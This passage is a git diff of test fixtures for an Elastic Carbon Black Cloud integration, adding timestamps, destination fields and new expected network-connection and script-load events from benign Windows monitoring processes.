UTC","org_key":"XXXXXXXX","device_id":"16","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05 +0000 UTC","create_time": "2022-02-10T08:03:29.540Z","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log-expected.json b/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log-expected.json index 93373b5e118..47e19456f48 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log-expected.json +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log-expected.json @@ -1,6 +1,7 @@ { "expected": [ { + "@timestamp": "2022-02-10T11:50:51.686Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -103,6 +104,7 @@ } }, { + "@timestamp": "2022-02-10T11:50:36.152Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -201,6 +203,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:55.630Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -323,6 +326,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:40.240Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -444,6 +448,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:40.177Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -565,6 +570,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:37.880Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -686,6 +692,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:39.521Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -807,6 +814,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:36.552Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -928,6 +936,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:38.068Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -1027,6 +1036,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:35.068Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -1126,6 +1136,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:35.443Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -1224,6 +1235,7 @@ ] }, { + "@timestamp": "2022-02-10T11:49:37.539Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -1322,6 +1334,7 @@ ] }, { + "@timestamp": "2022-02-10T11:48:14.278Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -1361,6 +1374,10 @@ "ip": "127.0.0.1", "port": 62909 }, + "destination": { + "ip": "127.0.0.1", + "port": 49707 + }, "ecs": { "version": "8.11.0" }, @@ -1423,13 +1440,14 @@ }, "source": { "ip": "127.0.0.1", - "port": 49707 + "port": 62909 }, "tags": [ "preserve_original_event" ] }, { + "@timestamp": "2022-02-10T11:45:02.888Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -1469,12 +1487,16 @@ "ip": "127.0.0.1", "port": 9716 }, + "destination": { + "ip": "67.43.156.14", + "port": 9001 + }, "ecs": { "version": "8.11.0" }, "event": { "action": "ACTION_CONNECTION_LISTEN", - "original": "{\"type\":\"endpoint.event.netconn\",\"process_guid\":\"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7\",\"parent_guid\":\"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4\",\"backend_timestamp\":\"2022-02-10 11:49:36 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"14\",\"device_name\":\"DESKTOP-014\",\"device_external_ip\":\"67.43.156.12\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_CONNECTION_LISTEN\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:45:02.8882089 +0000 UTC\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":9000,\"parent_pid\":720,\"process_publisher\":[{\"name\":\"Stellar Cyber Inc\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED\"}],\"process_path\":\"c:\\\\program files\\\\aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\",\"parent_path\":\"c:\\\\windows\\\\system32\\\\services.exe\",\"process_hash\":[\"6174da1a2dd7594456bbb3ae50ac5587\",\"2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515\"],\"parent_hash\":[\"d8e577bf078c45954f4531885478d5a9\",\"dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674\"],\"process_cmdline\":\"\\\"C:\\\\Program Files\\\\Aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\\\"\",\"parent_cmdline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"remote_port\":0,\"remote_ip\":\"127.0.0.1\",\"local_port\":9716,\"local_ip\":\"127.0.0.1\",\"netconn_domain\":\"\",\"netconn_inbound\":false,\"netconn_protocol\":\"PROTO_TCP\"}" + "original": "{\"type\":\"endpoint.event.netconn\",\"process_guid\":\"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7\",\"parent_guid\":\"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4\",\"backend_timestamp\":\"2022-02-10 11:49:36 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"14\",\"device_name\":\"DESKTOP-014\",\"device_external_ip\":\"67.43.156.12\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_CONNECTION_LISTEN\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:45:02.8882089 +0000 UTC\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":9000,\"parent_pid\":720,\"process_publisher\":[{\"name\":\"Stellar Cyber Inc\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED\"}],\"process_path\":\"c:\\\\program files\\\\aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\",\"parent_path\":\"c:\\\\windows\\\\system32\\\\services.exe\",\"process_hash\":[\"6174da1a2dd7594456bbb3ae50ac5587\",\"2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515\"],\"parent_hash\":[\"d8e577bf078c45954f4531885478d5a9\",\"dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674\"],\"process_cmdline\":\"\\\"C:\\\\Program Files\\\\Aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\\\"\",\"parent_cmdline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"remote_port\":9001,\"remote_ip\":\"67.43.156.14\",\"local_port\":9716,\"local_ip\":\"127.0.0.1\",\"netconn_domain\":\"\",\"netconn_inbound\":false,\"netconn_protocol\":\"PROTO_TCP\"}" }, "host": { "hostname": "DESKTOP-014", @@ -1531,13 +1553,128 @@ }, "source": { "ip": "127.0.0.1", - "port": 0 + "port": 9716 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2022-02-10T11:45:02.888Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:49:36 +0000 UTC" + }, + "device": { + "external_ip": "67.43.156.12", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:45:02.8882089 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Stellar Cyber Inc", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.netconn" + } + }, + "client": { + "ip": "127.0.0.1", + "port": 9716 + }, + "destination": { + "ip": "127.0.0.1", + "port": 9716 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_CONNECTION_LISTEN", + "original": "{\"type\":\"endpoint.event.netconn\",\"process_guid\":\"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7\",\"parent_guid\":\"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4\",\"backend_timestamp\":\"2022-02-10 11:49:36 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"14\",\"device_name\":\"DESKTOP-014\",\"device_external_ip\":\"67.43.156.12\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_CONNECTION_LISTEN\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:45:02.8882089 +0000 UTC\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":9000,\"parent_pid\":720,\"process_publisher\":[{\"name\":\"Stellar Cyber Inc\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED\"}],\"process_path\":\"c:\\\\program files\\\\aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\",\"parent_path\":\"c:\\\\windows\\\\system32\\\\services.exe\",\"process_hash\":[\"6174da1a2dd7594456bbb3ae50ac5587\",\"2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515\"],\"parent_hash\":[\"d8e577bf078c45954f4531885478d5a9\",\"dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674\"],\"process_cmdline\":\"\\\"C:\\\\Program Files\\\\Aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\\\"\",\"parent_cmdline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"remote_port\":9001,\"remote_ip\":\"67.43.156.14\",\"local_port\":9716,\"local_ip\":\"127.0.0.1\",\"netconn_domain\":\"\",\"netconn_inbound\":true,\"netconn_protocol\":\"PROTO_TCP\"}" + }, + "host": { + "hostname": "DESKTOP-014", + "id": "14", + "ip": [ + "67.43.156.12" + ], + "name": "DESKTOP-014", + "os": { + "type": "windows" + } + }, + "network": { + "direction": "inbound", + "transport": "tcp" + }, + "process": { + "command_line": "\"C:\\Program Files\\Aella\\aella_conf_win_srv\\aella_conf_win_srv.exe\"", + "entity_id": "XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7", + "executable": "c:\\program files\\aella\\aella_conf_win_srv\\aella_conf_win_srv.exe", + "hash": { + "md5": "6174da1a2dd7594456bbb3ae50ac5587", + "sha256": "2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515" + }, + "parent": { + "command_line": "C:\\WINDOWS\\system32\\services.exe", + "entity_id": "XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4", + "executable": "c:\\windows\\system32\\services.exe", + "hash": { + "md5": "d8e577bf078c45954f4531885478d5a9", + "sha256": "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674" + }, + "pid": 720 + }, + "pid": 9000 + }, + "related": { + "hash": [ + "2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515", + "6174da1a2dd7594456bbb3ae50ac5587", + "d8e577bf078c45954f4531885478d5a9", + "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674" + ], + "hosts": [ + "DESKTOP-014" + ], + "ip": [ + "67.43.156.14", + "127.0.0.1", + "67.43.156.12" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "source": { + "ip": "67.43.156.14", + "port": 9001 }, "tags": [ "preserve_original_event" ] }, { + "@timestamp": "2022-02-10T11:48:05.272Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -1645,6 +1782,450 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2022-02-10T11:48:05.272Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:48:51 +0000 UTC" + }, + "create_time": "2022-02-10T08:03:29.540Z", + "device": { + "external_ip": "89.160.20.156", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:48:05.2725926 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Microsoft Windows", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED", + "FILE_SIGNATURE_STATE_OS", + "FILE_SIGNATURE_STATE_CATALOG_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "scriptload": { + "count": 1, + "effective_reputation": "REP_NOT_LISTED", + "publisher": [ + { + "state": [ + "FILE_SIGNATURE_STATE_NOT_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING" + }, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.scriptload" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_LOAD_SCRIPT", + "original": "{\"type\":\"endpoint.event.scriptload\",\"process_guid\":\"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33\",\"parent_guid\":\"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49\",\"backend_timestamp\":\"2022-02-10 11:48:51 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"16\",\"device_name\":\"DESKTOP-015\",\"device_external_ip\":\"89.160.20.156\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_LOAD_SCRIPT\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:48:05.2725926 +0000 UTC\",\"create_time\": \"2022-02-10T08:03:29.540Z\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":4600,\"parent_pid\":6728,\"process_publisher\":[{\"name\":\"Microsoft Windows\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED\"}],\"process_path\":\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"parent_path\":\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"process_hash\":[\"24590bf74bbbbfd7d7ac070f4e3c44fd\",\"ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03\"],\"parent_hash\":[\"2d287989c6f60fa434a345b79b919755\",\"f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89\"],\"process_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"scriptload_count\":1,\"scriptload_reputation\":\"REP_RESOLVING\",\"scriptload_effective_reputation\":\"REP_NOT_LISTED\",\"scriptload_publisher\":[{\"state\":\"FILE_SIGNATURE_STATE_NOT_SIGNED\"}]}" + }, + "host": { + "hostname": "DESKTOP-015", + "id": "16", + "ip": [ + "89.160.20.156" + ], + "name": "DESKTOP-015", + "os": { + "type": "windows" + } + }, + "process": { + "command_line": "\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"", + "entity_id": "XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33", + "executable": "c:\\windows\\system32\\cscript.exe", + "hash": { + "md5": "24590bf74bbbbfd7d7ac070f4e3c44fd", + "sha256": "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03" + }, + "parent": { + "command_line": "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding", + "entity_id": "XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49", + "executable": "c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe", + "hash": { + "md5": "2d287989c6f60fa434a345b79b919755", + "sha256": "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + }, + "pid": 6728 + }, + "pid": 4600 + }, + "related": { + "hash": [ + "24590bf74bbbbfd7d7ac070f4e3c44fd", + "2d287989c6f60fa434a345b79b919755", + "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03", + "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + ], + "hosts": [ + "DESKTOP-015" + ], + "ip": [ + "89.160.20.156" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2022-02-10T11:48:05.272Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:48:51 +0000 UTC" + }, + "create_time": "2022-02-10T08:03:29.540Z", + "device": { + "external_ip": "89.160.20.156", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:48:05.272 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Microsoft Windows", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED", + "FILE_SIGNATURE_STATE_OS", + "FILE_SIGNATURE_STATE_CATALOG_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "scriptload": { + "count": 1, + "effective_reputation": "REP_NOT_LISTED", + "publisher": [ + { + "state": [ + "FILE_SIGNATURE_STATE_NOT_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING" + }, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.scriptload" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_LOAD_SCRIPT", + "original": "{\"type\":\"endpoint.event.scriptload\",\"process_guid\":\"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33\",\"parent_guid\":\"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49\",\"backend_timestamp\":\"2022-02-10 11:48:51 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"16\",\"device_name\":\"DESKTOP-015\",\"device_external_ip\":\"89.160.20.156\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_LOAD_SCRIPT\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:48:05.272 +0000 UTC\",\"create_time\": \"2022-02-10T08:03:29.540Z\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":4600,\"parent_pid\":6728,\"process_publisher\":[{\"name\":\"Microsoft Windows\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED\"}],\"process_path\":\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"parent_path\":\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"process_hash\":[\"24590bf74bbbbfd7d7ac070f4e3c44fd\",\"ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03\"],\"parent_hash\":[\"2d287989c6f60fa434a345b79b919755\",\"f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89\"],\"process_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"scriptload_count\":1,\"scriptload_reputation\":\"REP_RESOLVING\",\"scriptload_effective_reputation\":\"REP_NOT_LISTED\",\"scriptload_publisher\":[{\"state\":\"FILE_SIGNATURE_STATE_NOT_SIGNED\"}]}" + }, + "host": { + "hostname": "DESKTOP-015", + "id": "16", + "ip": [ + "89.160.20.156" + ], + "name": "DESKTOP-015", + "os": { + "type": "windows" + } + }, + "process": { + "command_line": "\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"", + "entity_id": "XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33", + "executable": "c:\\windows\\system32\\cscript.exe", + "hash": { + "md5": "24590bf74bbbbfd7d7ac070f4e3c44fd", + "sha256": "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03" + }, + "parent": { + "command_line": "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding", + "entity_id": "XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49", + "executable": "c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe", + "hash": { + "md5": "2d287989c6f60fa434a345b79b919755", + "sha256": "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + }, + "pid": 6728 + }, + "pid": 4600 + }, + "related": { + "hash": [ + "24590bf74bbbbfd7d7ac070f4e3c44fd", + "2d287989c6f60fa434a345b79b919755", + "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03", + "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + ], + "hosts": [ + "DESKTOP-015" + ], + "ip": [ + "89.160.20.156" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2022-02-10T11:48:05.200Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:48:51 +0000 UTC" + }, + "create_time": "2022-02-10T08:03:29.540Z", + "device": { + "external_ip": "89.160.20.156", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:48:05.2 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Microsoft Windows", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED", + "FILE_SIGNATURE_STATE_OS", + "FILE_SIGNATURE_STATE_CATALOG_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "scriptload": { + "count": 1, + "effective_reputation": "REP_NOT_LISTED", + "publisher": [ + { + "state": [ + "FILE_SIGNATURE_STATE_NOT_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING" + }, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.scriptload" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_LOAD_SCRIPT", + "original": "{\"type\":\"endpoint.event.scriptload\",\"process_guid\":\"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33\",\"parent_guid\":\"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49\",\"backend_timestamp\":\"2022-02-10 11:48:51 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"16\",\"device_name\":\"DESKTOP-015\",\"device_external_ip\":\"89.160.20.156\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_LOAD_SCRIPT\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:48:05.2 +0000 UTC\",\"create_time\": \"2022-02-10T08:03:29.540Z\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":4600,\"parent_pid\":6728,\"process_publisher\":[{\"name\":\"Microsoft Windows\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED\"}],\"process_path\":\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"parent_path\":\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"process_hash\":[\"24590bf74bbbbfd7d7ac070f4e3c44fd\",\"ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03\"],\"parent_hash\":[\"2d287989c6f60fa434a345b79b919755\",\"f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89\"],\"process_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"scriptload_count\":1,\"scriptload_reputation\":\"REP_RESOLVING\",\"scriptload_effective_reputation\":\"REP_NOT_LISTED\",\"scriptload_publisher\":[{\"state\":\"FILE_SIGNATURE_STATE_NOT_SIGNED\"}]}" + }, + "host": { + "hostname": "DESKTOP-015", + "id": "16", + "ip": [ + "89.160.20.156" + ], + "name": "DESKTOP-015", + "os": { + "type": "windows" + } + }, + "process": { + "command_line": "\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"", + "entity_id": "XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33", + "executable": "c:\\windows\\system32\\cscript.exe", + "hash": { + "md5": "24590bf74bbbbfd7d7ac070f4e3c44fd", + "sha256": "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03" + }, + "parent": { + "command_line": "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding", + "entity_id": "XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49", + "executable": "c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe", + "hash": { + "md5": "2d287989c6f60fa434a345b79b919755", + "sha256": "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + }, + "pid": 6728 + }, + "pid": 4600 + }, + "related": { + "hash": [ + "24590bf74bbbbfd7d7ac070f4e3c44fd", + "2d287989c6f60fa434a345b79b919755", + "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03", + "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + ], + "hosts": [ + "DESKTOP-015" + ], + "ip": [ + "89.160.20.156" + ], + 